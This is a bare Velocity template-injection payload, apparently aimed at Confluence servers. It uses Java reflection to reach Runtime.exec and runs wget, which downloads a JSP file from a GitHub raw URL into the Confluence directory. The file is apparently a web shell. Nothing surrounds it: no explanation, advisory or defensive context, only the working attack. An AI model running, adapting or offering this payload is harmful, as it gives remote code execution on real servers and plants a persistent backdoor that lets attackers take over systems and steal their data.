#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("wget -O /../confluence/test.jsp https://raw.githubusercontent.com/jlwsellb/code/master/403.jsp.txt")
